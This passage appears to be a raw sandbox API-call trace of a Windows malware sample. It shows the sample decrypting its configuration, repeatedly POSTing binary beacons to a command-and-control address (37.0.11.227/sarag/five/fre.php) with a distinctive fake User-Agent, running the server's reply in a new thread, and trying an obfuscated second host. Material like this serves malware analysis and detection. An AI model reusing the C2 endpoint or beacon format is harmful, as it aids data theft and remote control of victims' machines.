returned 0x76ed0000 [0220.045] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0220.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.047] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0220.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.065] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0220.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.066] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0220.066] GetProcessHeap () returned 0x690000 [0220.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0220.066] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0220.066] GetProcessHeap () returned 0x690000 [0220.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0220.066] socket (af=2, type=1, protocol=6) returned 0x558 [0220.067] connect (s=0x558, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0220.100] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0220.100] GetProcessHeap () returned 0x690000 [0220.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0220.100] GetProcessHeap () returned 0x690000 [0220.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0220.101] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0220.103] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0220.103] GetProcessHeap () returned 0x690000 [0220.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0220.103] GetProcessHeap () returned 0x690000 [0220.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0220.103] GetProcessHeap () returned 0x690000 [0220.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0220.103] GetProcessHeap () returned 0x690000 [0220.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0220.104] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0220.108] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0220.108] GetProcessHeap () returned 0x690000 [0220.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0220.108] GetProcessHeap () returned 0x690000 [0220.108] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0220.109] send (s=0x558, buf=0x6ab500*, len=242, flags=0) returned 242 [0220.109] send (s=0x558, buf=0x6aba40*, len=159, flags=0) returned 159 [0220.110] GetProcessHeap () returned 0x690000 [0220.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0220.110] recv (in: s=0x558, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0220.210] GetProcessHeap () returned 0x690000 [0220.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0220.212] GetProcessHeap () returned 0x690000 [0220.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0220.212] GetProcessHeap () returned 0x690000 [0220.213] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0220.213] GetProcessHeap () returned 0x690000 [0220.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0220.215] closesocket (s=0x558) returned 0 [0220.215] GetProcessHeap () returned 0x690000 [0220.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0220.215] GetProcessHeap () returned 0x690000 [0220.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0220.217] GetProcessHeap () returned 0x690000 [0220.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0220.217] GetProcessHeap () returned 0x690000 [0220.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0220.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb94) returned 0x558 [0220.262] Sleep (dwMilliseconds=0xea60) [0220.264] GetProcessHeap () returned 0x690000 [0220.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0220.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.265] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.674] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0220.684] GetProcessHeap () returned 0x690000 [0220.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0220.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.685] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0220.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.686] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0220.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.761] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.761] GetProcessHeap () returned 0x690000 [0220.762] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0220.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.766] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0220.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.767] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0220.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.769] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0220.769] GetProcessHeap () returned 0x690000 [0220.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0220.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.770] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0220.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.771] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0220.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.772] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0220.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.776] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0220.776] GetProcessHeap () returned 0x690000 [0220.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0220.776] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0220.777] GetProcessHeap () returned 0x690000 [0220.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0220.777] GetProcessHeap () returned 0x690000 [0220.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0220.777] GetProcessHeap () returned 0x690000 [0220.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0220.778] GetProcessHeap () returned 0x690000 [0220.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0220.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.779] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.785] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0220.798] GetProcessHeap () returned 0x690000 [0220.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0220.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.800] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0220.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.801] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0220.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.802] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.802] GetProcessHeap () returned 0x690000 [0220.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0220.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.804] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0220.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.812] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0220.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.813] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0220.813] GetProcessHeap () returned 0x690000 [0220.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0220.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.814] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0220.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.816] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0220.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.817] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0220.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.818] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0220.818] GetProcessHeap () returned 0x690000 [0220.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0220.818] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0220.818] GetProcessHeap () returned 0x690000 [0220.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0220.818] socket (af=2, type=1, protocol=6) returned 0x55c [0220.819] connect (s=0x55c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0220.843] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0220.843] GetProcessHeap () returned 0x690000 [0220.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0220.844] GetProcessHeap () returned 0x690000 [0220.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0220.844] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0220.845] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0220.845] GetProcessHeap () returned 0x690000 [0220.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0220.845] GetProcessHeap () returned 0x690000 [0220.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0220.846] GetProcessHeap () returned 0x690000 [0220.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0220.846] GetProcessHeap () returned 0x690000 [0220.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0220.847] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0220.848] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0220.848] GetProcessHeap () returned 0x690000 [0220.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0220.848] GetProcessHeap () returned 0x690000 [0220.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0220.849] send (s=0x55c, buf=0x6ab500*, len=242, flags=0) returned 242 [0220.849] send (s=0x55c, buf=0x6aba40*, len=159, flags=0) returned 159 [0220.849] GetProcessHeap () returned 0x690000 [0220.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0220.849] recv (in: s=0x55c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0220.934] GetProcessHeap () returned 0x690000 [0220.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0220.935] GetProcessHeap () returned 0x690000 [0220.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0220.936] GetProcessHeap () returned 0x690000 [0220.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0220.937] GetProcessHeap () returned 0x690000 [0220.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0220.937] closesocket (s=0x55c) returned 0 [0220.938] GetProcessHeap () returned 0x690000 [0220.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0220.938] GetProcessHeap () returned 0x690000 [0220.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0220.938] GetProcessHeap () returned 0x690000 [0220.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0220.939] GetProcessHeap () returned 0x690000 [0220.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0220.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1338) returned 0x55c [0220.941] Sleep (dwMilliseconds=0xea60) [0220.943] GetProcessHeap () returned 0x690000 [0220.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0220.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.944] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0220.963] GetProcessHeap () returned 0x690000 [0220.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0220.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.964] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0220.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.965] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0220.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.966] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.966] GetProcessHeap () returned 0x690000 [0220.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0220.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.968] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0220.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.969] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0220.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.970] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0220.970] GetProcessHeap () returned 0x690000 [0220.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0220.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.971] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0220.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.975] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0220.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.976] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0220.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.979] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0220.979] GetProcessHeap () returned 0x690000 [0220.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0220.980] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0220.980] GetProcessHeap () returned 0x690000 [0220.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0220.980] GetProcessHeap () returned 0x690000 [0220.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0220.981] GetProcessHeap () returned 0x690000 [0220.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0220.981] GetProcessHeap () returned 0x690000 [0220.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0220.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.982] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0221.005] GetProcessHeap () returned 0x690000 [0221.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0221.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.006] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0221.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.009] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.010] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.010] GetProcessHeap () returned 0x690000 [0221.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0221.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.011] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0221.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.023] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0221.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.024] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0221.024] GetProcessHeap () returned 0x690000 [0221.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0221.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.025] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0221.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.026] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0221.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.028] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0221.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.029] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0221.029] GetProcessHeap () returned 0x690000 [0221.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0221.029] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0221.029] GetProcessHeap () returned 0x690000 [0221.029] 